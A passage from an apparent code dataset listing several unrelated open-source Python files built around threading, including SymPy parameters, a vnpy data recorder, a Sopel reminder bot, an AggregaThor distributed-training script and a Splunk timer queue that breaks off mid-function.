source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
parameters.py
|
"""Thread-safe global parameters"""
from .cache import clear_cache
from contextlib import contextmanager
from threading import local
class _global_parameters(local):
"""
Thread-local global parameters.
Explanation
===========
This class generates thread-local container for SymPy's global parameters.
Every global parameters must be passed as keyword argument when generating
its instance.
A variable, `global_parameters` is provided as default instance for this class.
WARNING! Although the global parameters are thread-local, SymPy's cache is not
by now.
This may lead to undesired result in multi-threading operations.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.cache import clear_cache
>>> from sympy.core.parameters import global_parameters as gp
>>> gp.evaluate
True
>>> x+x
2*x
>>> log = []
>>> def f():
... clear_cache()
... gp.evaluate = False
... log.append(x+x)
... clear_cache()
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> print(log)
[x + x]
>>> gp.evaluate
True
>>> x+x
2*x
References
==========
.. [1] https://docs.python.org/3/library/threading.html
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __setattr__(self, name, value):
if getattr(self, name) != value:
clear_cache()
return super().__setattr__(name, value)
global_parameters = _global_parameters(evaluate=True, distribute=True)
@contextmanager
def evaluate(x):
""" Control automatic evaluation
This context manager controls whether or not all SymPy functions evaluate
by default.
Note that much of SymPy expects evaluated expressions. This functionality
is experimental and is unlikely to function as intended on large
expressions.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import evaluate
>>> print(x + x)
2*x
>>> with evaluate(False):
... print(x + x)
x + x
"""
old = global_parameters.evaluate
try:
global_parameters.evaluate = x
yield
finally:
global_parameters.evaluate = old
@contextmanager
def distribute(x):
""" Control automatic distribution of Number over Add
This context manager controls whether or not Mul distribute Number over
Add. Plan is to avoid distributing Number over Add in all of sympy. Once
that is done, this contextmanager will be removed.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import distribute
>>> print(2*(x + 1))
2*x + 2
>>> with distribute(False):
... print(2*(x + 1))
2*(x + 1)
"""
old = global_parameters.distribute
try:
global_parameters.distribute = x
yield
finally:
global_parameters.distribute = old
|
engine.py
|
""""""
from threading import Thread
from queue import Queue, Empty
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
SubscribeRequest,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT
from vnpy.trader.utility import load_json, save_json, BarGenerator
from vnpy.trader.database import database_manager
APP_NAME = "DataRecorder"
EVENT_RECORDER_LOG = "eRecorderLog"
EVENT_RECORDER_UPDATE = "eRecorderUpdate"
class RecorderEngine(BaseEngine):
""""""
setting_filename = "data_recorder_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.queue = Queue()
self.thread = Thread(target=self.run)
self.active = False
self.tick_recordings = {}
self.bar_recordings = {}
self.bar_generators = {}
self.load_setting()
self.register_event()
self.start()
self.put_event()
def load_setting(self):
""""""
setting = load_json(self.setting_filename)
self.tick_recordings = setting.get("tick", {})
self.bar_recordings = setting.get("bar", {})
def save_setting(self):
""""""
setting = {
"tick": self.tick_recordings,
"bar": self.bar_recordings
}
save_json(self.setting_filename, setting)
def run(self):
""""""
while self.active:
try:
task = self.queue.get(timeout=1)
task_type, data = task
if task_type == "tick":
database_manager.save_tick_data([data])
elif task_type == "bar":
database_manager.save_bar_data([data])
except Empty:
continue
def close(self):
""""""
"""收盘后最后k线生成
for vt_symbol in self.bar_recordings:
bg = self.get_bar_generator(vt_symbol)
bg.generate()"""
self.active = False
if self.thread.isAlive():
self.thread.join()
database_manager.close()
def start(self):
""""""
self.active = True
self.thread.start()
def add_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.bar_recordings:
self.write_log(f"已在K线记录列表中:{vt_symbol}")
return
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.bar_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
self.save_setting()
self.put_event()
self.write_log(f"添加K线记录成功:{vt_symbol}")
def add_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.tick_recordings:
self.write_log(f"已在Tick记录列表中:{vt_symbol}")
return
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.tick_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
self.save_setting()
self.put_event()
self.write_log(f"添加Tick记录成功:{vt_symbol}")
def remove_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.bar_recordings:
self.write_log(f"不在K线记录列表中:{vt_symbol}")
return
self.bar_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除K线记录成功:{vt_symbol}")
def remove_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.tick_recordings:
self.write_log(f"不在Tick记录列表中:{vt_symbol}")
return
self.tick_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除Tick记录成功:{vt_symbol}")
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
if tick.vt_symbol in self.tick_recordings:
self.record_tick(tick)
if tick.vt_symbol in self.bar_recordings:
bg = self.get_bar_generator(tick.vt_symbol)
bg.update_tick(tick)
def process_contract_event(self, event: Event):
""""""
contract = event.data
vt_symbol = contract.vt_symbol
if (vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings):
self.subscribe(contract)
def write_log(self, msg: str):
""""""
event = Event(
EVENT_RECORDER_LOG,
msg
)
self.event_engine.put(event)
def put_event(self):
""""""
tick_symbols = list(self.tick_recordings.keys())
tick_symbols.sort()
bar_symbols = list(self.bar_recordings.keys())
bar_symbols.sort()
data = {
"tick": tick_symbols,
"bar": bar_symbols
}
event = Event(
EVENT_RECORDER_UPDATE,
data
)
self.event_engine.put(event)
def record_tick(self, tick: TickData):
""""""
task = ("tick", copy(tick))
self.queue.put(task)
def record_bar(self, bar: BarData):
""""""
task = ("bar", copy(bar))
self.queue.put(task)
def get_bar_generator(self, vt_symbol: str):
""""""
bg = self.bar_generators.get(vt_symbol, None)
if not bg:
bg = BarGenerator(self.record_bar)
self.bar_generators[vt_symbol] = bg
return bg
def subscribe(self, contract: ContractData):
""""""
req = SubscribeRequest(
symbol=contract.symbol,
exchange=contract.exchange
)
self.main_engine.subscribe(req, contract.gateway_name)
|
__init__.py
|
from flask import Flask, render_template
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from config import Config, initialize, generate_peers
from app.node import Node
from threading import Thread
from flask import g
apps = []
chord_node = None
nodes = dict()
app = Flask(__name__)
for port in initialize():
chord_node = Node(port, None, None)
nodes[ str(port) ] = chord_node
# print(f"Here is app before import: {app}")
# Config.update_port(port)
app.config.from_object(Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
login = LoginManager(app)
login.login_view = "login"
login.login_message = "Please log in to access this page."
bootstrap = Bootstrap(str(port), app)
app.chord_node = chord_node
from app import routes, models
# Thread(target=app.run, kwargs={"port":port}).start()
apps.append([app, chord_node])
|
test_tomcat.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import os
import threading
import time
from types import ListType
import unittest
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/datadog/collector.log',
'forwarder_log_file': '/var/log/datadog/forwarder.log',
'dogstatsd_log_file': '/var/log/datadog/dogstatsd.log',
'jmxfetch_log_file': '/var/log/datadog/jmxfetch.log',
'go-metro_log_file': '/var/log/datadog/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from jmxfetch import JMXFetch
from dogstatsd import Server
STATSD_PORT = 8126
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='tomcat')
class TestTomcat(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__), 'ci')
# confd_path = os.path.join(os.environ['VOLATILE_DIR'], 'jmx_yaml')
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def test_tomcat_metrics(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
self.assertEquals(len([t for t in metrics if t['metric'] == "tomcat.threads.busy" and "instance:tomcat_instance" in t['tags']]), 2, metrics)
self.assertEquals(len([t for t in metrics if t['metric'] == "tomcat.bytes_sent" and "instance:tomcat_instance" in t['tags']]), 0, metrics)
self.assertTrue(len([t for t in metrics if "jvm." in t['metric'] and "instance:tomcat_instance" in t['tags']]) > 4, metrics)
|
remind.py
|
# coding=utf8
"""
remind.py - Sopel Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://sopel.chat
"""
from __future__ import unicode_literals
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from sopel.module import commands, example, NOLIMIT
import sopel.tools
from sopel.tools.time import get_timezone, format_time
try:
import pytz
except:
pytz = None
def filename(self):
name = self.nick + '-' + self.config.core.host + '.reminders.db'
return os.path.join(self.config.core.homedir, name)
def load_database(name):
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime)) # WTFs going on here?
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in sopel.tools.iteritems(data):
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
def setup(bot):
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
"""Gives you a reminder in the given amount of time."""
if not trigger.group(2):
bot.say("Missing arguments for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message given for reminder.")
return NOLIMIT
duration = 0
message = filter(None, re.split('(\d+(?:\.\d+)? ?(?:(?i)' + periods + ')) ?',
trigger.group(2))[1:])
reminder = ''
stop = False
for piece in message:
grp = re.match('(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
factor = scaling.get(grp.group(2).lower(), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand the input.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
timezone = get_timezone(
bot.db, bot.config, None, trigger.nick, trigger.sender)
create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
"""
Gives you a reminder at the given time. Takes hh:mm:ssTimezone
message. Timezone is any timezone Sopel takes elsewhere; the best choices
are those from the tzdb; a list of valid options is available at
http://sopel.chat/tz . The seconds and timezone are optional.
"""
if not trigger.group(2):
bot.say("No arguments given for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message given for reminder.")
return NOLIMIT
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand your input.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if pytz:
timezone = get_timezone(bot.db, bot.config, tz,
trigger.nick, trigger.sender)
if not timezone:
timezone = 'UTC'
now = datetime.now(pytz.timezone(timezone))
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second),
tzinfo=now.tzinfo)
timediff = at_time - now
else:
if tz and tz.upper() != 'UTC':
bot.reply("I don't have timzeone support installed.")
return NOLIMIT
now = datetime.now()
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second))
timediff = at_time - now
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
remind_at = datetime.utcfromtimestamp(t)
timef = format_time(bot.db, bot.config, tz, trigger.nick,
trigger.sender, remind_at)
bot.reply('Okay, will remind at %s' % timef)
else:
bot.reply('Okay, will remind in %s secs' % duration)
|
train.py
|
# -*- coding: utf-8 -*-
##############################################################
# train.py
# Copyright (C) 2018 Tsubasa Hirakawa. All rights reserved.
##############################################################
import os
import time
import math
import numpy as np
import multiprocessing as mp
from MaxEntIRL import MaxEntIRL
from util import chunk_list, read_text
BASE_FILE = "./data/basename.txt"
TRAJECTORY_PATH = "./data/tracking"
FEATURE_MAP_FILE = "./data/feature_map/feature_map_3d.npy"
IMAGE_FILE = "./data/image/image2.png"
RESULT_DIR = "./RESULT"
CACHE_DIR = "./CACHE"
class Trainer:
def __init__(self, input_basename_list):
self.FLOAT_MAX = 1e30
self.FLOAT_MIN = 1e-30
self.n_cpu = mp.cpu_count()
self.basename_list = input_basename_list
self.split_base_list = chunk_list(self.basename_list, (len(self.basename_list) / self.n_cpu) + 1)
self.n_feature = np.load(FEATURE_MAP_FILE).shape[0]
self.n_data = len(input_basename_list)
self.w = np.ones(self.n_feature, dtype=np.float32) * 0.5
self.w_best = []
# empirical feature count
self.f_empirical = np.zeros(self.n_feature, dtype=np.float32)
self.f_expected = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient_best = []
self.loglikelihood = 0.0
self.min_loglikelihood = -self.FLOAT_MAX
self.lam = 0.01
self.DELTA = 0.01
self.converged = False
self.pid = os.getpid()
# compute empirical feature count
for bname in self.basename_list:
tmp_model = MaxEntIRL()
tmp_model.load_trajectory(os.path.join(TRAJECTORY_PATH, bname + ".npy"))
tmp_model.update_weight(self.w)
tmp_model.load_features(FEATURE_MAP_FILE)
tmp_model.load_image(IMAGE_FILE)
self.f_empirical += tmp_model.compute_empirical_feature_count()
self.f_empirical /= self.n_feature
print "empirical feature count:", self.f_empirical
# make cache directory
if not os.path.exists(CACHE_DIR):
os.mkdir(CACHE_DIR)
def backward_forward_pass(self):
thread = []
for th_i, b_list in enumerate(self.split_base_list):
thread.append(mp.Process(target=self.back_forward_single_thread, args=(b_list, self.w, th_i)))
for t in thread:
t.start()
for t in thread:
t.join()
self.loglikelihood = 0.0
self.f_expected *= 0.0
for th_i, t in enumerate(thread):
ll_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, th_i)))
f_exp_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, th_i)))
self.loglikelihood += np.sum(ll_tmp)
self.f_expected += np.sum(f_exp_tmp, axis=0)
self.loglikelihood /= float(self.n_data)
self.f_expected /= float(self.n_data)
def back_forward_single_thread(self, basename, weight, thread_index):
loglikelihood_tmp = []
f_expected_list = []
for bn in basename:
print bn
_start = time.time()
model = MaxEntIRL()
model.load_trajectory(os.path.join(TRAJECTORY_PATH, bn + ".npy"))
model.update_weight(weight)
model.load_features(FEATURE_MAP_FILE)
model.load_image(IMAGE_FILE)
model.compute_reward()
model.compute_soft_value_function()
model.compute_policy()
model.compute_forecast_distribution()
loglikelihood_tmp.append(model.compute_trajectory_likelihood())
f_expected_list.append(model.accumulate_expected_feature_count())
_end = time.time()
print "done. time", _end - _start
# save
np.save(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, thread_index)), np.array(loglikelihood_tmp))
np.save(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, thread_index)), np.array(f_expected_list))
def gradient_update(self):
improvement = self.loglikelihood - self.min_loglikelihood
if improvement > self.DELTA:
self.min_loglikelihood = self.loglikelihood
elif -self.DELTA < improvement < self.DELTA:
improvement = 0
print "improved by", improvement
# update parameters
if improvement < 0:
print "NO IMPROVEMENT: decrease step size and redo"
self.lam = self.lam * 0.5
for f in range(self.n_feature):
self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
elif improvement > 0:
print "IMPROVEMENT: increase step size"
self.w_best = self.w.copy()
self.lam = self.lam * 2.0
for f in range(self.n_feature):
self.f_gradient[f] = self.f_empirical[f] - self.f_expected[f]
for f in range(self.n_feature):
self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
elif improvement == 0:
print "CONVERGED"
self.converged = True
print "lambda:", self.lam
print "f_empirical:", self.f_empirical
print "f_expected:", self.f_expected
def save_parameter(self, output_filename):
np.savetxt(output_filename, self.w)
if __name__ == '__main__':
if not os.path.exists(RESULT_DIR):
os.mkdir(RESULT_DIR)
basename_list = read_text(BASE_FILE)
trainer = Trainer(basename_list)
iteration = 0
while not trainer.converged:
start = time.time()
trainer.backward_forward_pass()
trainer.gradient_update()
trainer.save_parameter(os.path.join(RESULT_DIR, "weight-%03d.txt" % iteration))
iteration += 1
end = time.time()
print "time of this iteration:", end - start, "s"
trainer.save_parameter(os.path.join(RESULT_DIR, "weight.txt"))
print "train: done."
|
trainer.py
|
# coding: utf-8
###
# @file trainer.py
# @author Arsany Guirguis <arsany.guirguis@epfl.ch>
#
# @section LICENSE
#
# Copyright (c) 2020 Arsany Guirguis.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# @section DESCRIPTION
#
# AggregaThor implementation using Garfiled++ library, which is based on RPC
# this file can be used by both the parameter server and the workers
# original paper: https://mlsys.org/Conferences/2019/doc/2019/54.pdf
###
#!/usr/bin/env python
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributed.rpc as rpc
import torch.optim as optim
from torch.distributed.rpc import RRef, rpc_async, remote
from time import time
import argparse
import sys
import json
import threading
import garfieldpp
from garfieldpp.worker import Worker
from garfieldpp.byzWorker import ByzWorker
from garfieldpp.server import Server
from garfieldpp.tools import get_bytes_com,convert_to_gbit, adjust_learning_rate
import aggregators
CIFAR_NUM_SAMPLES = 50000
#First, parse the inputs
parser = argparse.ArgumentParser(description="AggregaThor implementation using Garfield++ library", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--master",
type=str,
default="",
help="Master node in the deployment. This node takes rank 0, usually the first PS.")
parser.add_argument("--rank",
type=int,
default=0,
help="Rank of a process in a distributed setup.")
parser.add_argument("--dataset",
type=str,
default="mnist",
help="Dataset to be used, e.g., mnist, cifar10,...")
parser.add_argument("--batch",
type=int,
default=32,
help="Minibatch size to be employed by each worker.")
parser.add_argument("--num_ps",
type=int,
default=1,
help="Number of parameter servers in the deployment (Vanilla AggregaThor uses 1 ps).")
parser.add_argument("--num_workers",
type=int,
default=1,
help="Number of workers in the deployment.")
parser.add_argument("--fw",
type=int,
default=0,
help="Number of declared Byzantine workers.")
parser.add_argument("--fps",
type=int,
default=0,
help="Number of declared Byzantine parameter servers (Vanilla AggregaThor does not assume Byzantine servers).")
parser.add_argument("--model",
type=str,
default='convnet',
help="Model to be trained, e.g., convnet, cifarnet, resnet,...")
parser.add_argument("--loss",
type=str,
default='nll',
help="Loss function to optimize against.")
parser.add_argument("--optimizer",
type=str,
default='sgd',
help="Optimizer to use.")
parser.add_argument("--opt_args",
type=json.loads,
default={'lr':'0.1'},
help="Optimizer arguments; passed in dict format, e.g., '{\"lr\":\"0.1\"}'")
parser.add_argument("--num_iter",
type=int,
default=5000,
help="Number of training iterations to execute.")
parser.add_argument("--gar",
type=str,
default='average',
help="Aggregation rule for aggregating gradients.")
parser.add_argument('--acc_freq',
type=int,
default=100,
help="The frequency of computing accuracy while training.")
parser.add_argument('--bench',
type=bool,
default=False,
help="If True, time elapsed in each step is printed.")
parser.add_argument('--log',
type=bool,
default=False,
help="If True, accumulated loss at each iteration is printed.")
FLAGS = parser.parse_args(sys.argv[1:])
master = FLAGS.master
assert len(master) > 0
rank = FLAGS.rank
assert rank >= 0
num_ps = FLAGS.num_ps
assert num_ps >= 1
num_workers = FLAGS.num_workers
assert num_workers >= 1
world_size = num_workers + num_ps
fw = FLAGS.fw
assert fw*2 < num_workers
fps = FLAGS.fps
assert fps*2 < num_ps
dataset = FLAGS.dataset
assert len(dataset) > 0
batch = FLAGS.batch
assert batch >= 1
model = FLAGS.model
assert len(model) > 0
loss = FLAGS.loss
assert len(loss) > 0
optimizer = FLAGS.optimizer
assert len(optimizer) > 0
opt_args = FLAGS.opt_args
for k in opt_args:
opt_args[k] = float(opt_args[k])
assert opt_args['lr']
num_iter = FLAGS.num_iter
assert num_iter > 0
gar = FLAGS.gar
assert len(gar) > 0
acc_freq = FLAGS.acc_freq
assert(acc_freq > 10)
bench = FLAGS.bench
if bench:
from timeit import timeit
else:
timeit = None
log = FLAGS.log
#os.environ['CUDA_VISIBLE_DEVICES'] = str((rank%2))
print("**** SETUP AT NODE {} ***".format(rank))
print("Number of workers: ", num_workers)
print("Number of servers: ", num_ps)
print("Number of declared Byzantine workers: ", fw)
print("Number of declared Byzantine parameter servers: ", fps)
print("GAR: ", gar)
print("Dataset: ", dataset)
print("Model: ", model)
print("Batch size: ", batch)
print("Loss function: ", loss)
print("Optimizer: ", optimizer)
print("Optimizer Args", opt_args)
print("Benchmarking? ", bench)
print("Logging loss at each iteration?", log)
print("------------------------------------")
sys.stdout.flush()
lr = opt_args['lr']
#initiating the GAR
gar = aggregators.gars.get(gar)
assert gar is not None
os.environ['MASTER_ADDR'] = master
os.environ['MASTER_PORT'] = '29500'
torch.manual_seed(1234) #For reproducibility
if torch.cuda.is_available():
torch.cuda.manual_seed_all(1234) #For reproducibility
if bench:
torch.backends.cudnn.benchmark=True
#convention: low ranks are reserved for parameter servers
if rank < num_ps:
rpc.init_rpc('ps:{}'.format(rank), rank=rank, world_size=world_size)
#Initialize a parameter server and write the training loop
ps = Server(rank, world_size, num_workers,1, fw, fps, 'worker:', 'ps:', batch, model, dataset, optimizer, **opt_args)
scheduler = torch.optim.lr_scheduler.MultiStepLR(ps.optimizer, milestones=[150, 250, 350], gamma=0.1) #This line shows sophisticated stuff that can be done out of the Garfield++ library
start_time = time()
iter_per_epoch = CIFAR_NUM_SAMPLES//(num_workers * batch) #this value records how many iteration per sample
print("One EPOCH consists of {} iterations".format(iter_per_epoch))
sys.stdout.flush()
for i in range(num_iter):
if i%(iter_per_epoch*30) == 0 and i!=0: #One hack for better convergence with Cifar10
lr*=0.2
adjust_learning_rate(ps.optimizer, lr)
#training loop goes here
def train_step():
if bench:
bytes_rec = get_bytes_com() #record number of bytes sent before the training step to work as a checkpoint
with torch.autograd.profiler.profile(enabled=bench) as prof:
gradients = ps.get_gradients(i, num_workers-fw) #get_gradients(iter_num, num_wait_wrk)
aggr_grad = gar(gradients=gradients, f=fw) #aggr_grad = gar.aggregate(gradients)
ps.update_model(aggr_grad)
if bench:
print(prof.key_averages().table(sort_by="self_cpu_time_total"))
bytes_train = get_bytes_com()
print("Consumed bandwidth in this iteration: {} Gbits".format(convert_to_gbit(bytes_train-bytes_rec)))
# print("Memory allocated to GPU {} Memory cached on GPU {}".format(torch.cuda.memory_allocated(0), torch.cuda.memory_cached(0)))
sys.stdout.flush()
if timeit is not None:
res = timeit(train_step,number=1)
print("Training step {} takes {} seconds".format(i,res))
sys.stdout.flush()
else:
train_step()
if i%iter_per_epoch == 0:
def test_step():
acc = ps.compute_accuracy()
num_epochs = i/iter_per_epoch
print("Epoch: {} Accuracy: {} Time: {}".format(num_epochs,acc,time()-start_time))
sys.stdout.flush()
if timeit is not None:
res = timeit(test_step,number=1)
print("Test step takes {} seconds".format(res))
else:
# test_step() #Though threading is a good idea, applying it here messes the use of CPU with GPU
# if model.startswith('resnet') and i!=0:
# scheduler.step()
threading.Thread(target=test_step).start()
else:
rpc.init_rpc('worker:{}'.format(rank-num_ps), rank=rank, world_size=world_size)
#initialize a worker here
Worker(rank, world_size, num_workers, batch, model, dataset, loss)
# ByzWorker(rank, world_size, num_workers, batch, model, dataset, loss, 'drop')
rpc.shutdown()
|
timer_queue.py
|
"""
A timer queue implementation
"""
import threading
import Queue
from time import time
import traceback
from splunktalib.timer import Timer
from splunktalib.common import log
logger = log.Logs().get_logger("util")
class TimerQueue(object):
"""
A timer queue implementation, runs a separate thread to handle timers
"""
import sortedcontainers as sc
def __init__(self):
self._timers = TimerQueue.sc.SortedSet()
self._cancelling_timers = {}
self._lock = threading.Lock()
self._wakeup_queue = Queue.Queue()
self._thr = threading.Thread(target=self._check_and_execute)
self._thr.daemon = True
self._started = False
def start(self):
"""
Start the timer queue to make it start function
"""
if self._started:
return
self._started = True
self._thr.start()
logger.info("TimerQueue started.")
def tear_down(self):
if not self._started:
return
self._started = True
self._wakeup(None)
self._thr.join()
def add_timer(self, callback, when, interval):
"""
Add timer to the queue
"""
timer = Timer(callback, when, interval)
with self._lock:
self._timers.add(timer)
self._wakeup()
return timer
def remove_timer(self, timer):
"""
Remove timer from the queue.
"""
with self._lock:
try:
self._timers.remove(timer)
except ValueError:
logger.info("Timer=%s is not in queue, move it to cancelling "
"list", timer.ident())
else:
self._cancelling_timers[timer.ident()] = timer
def _check_and_execute(self):
wakeup_queue = self._wakeup_queue
while 1:
(next_expired_time, expired_timers) = self._get_expired_timers()
for timer in expired_timers:
try:
timer()
except Exception:
logger.error(traceback.format_exc())
self._reset_timers(expired_timers)
# Calc sleep time
if next_expired_time:
now = time()
if now < next_expired_time:
sleep_time = next_expired_time - now
else:
sleep_time = 0.1
else:
sleep_time = 1
try:
wakeup = wakeup_queue.get(timeout=sleep_time)
if wakeup is None:
break
except Queue.Empty:
pass
logger.info("TimerQueue stopped.")
def _get_expired_timers(self):
next_expired_time = 0
now = time()
expired_timers = []
with self._lock:
for timer in self._timers:
if timer.get_expiration() <= now:
expired_timers.append(timer)
if expired_timers:
del self._timers[:len(expired_timers)]
if self._timers:
next_expired_time = self._timers[0].get_expiration()
return (next_expired_time, expired_timers)
def _reset_timers(self, expired_timers):
has_new_timer = False
with self._lock:
cancelling_timers = self._cancelling_timers
for timer in expired_timers:
if timer.ident() in cancelling_timers:
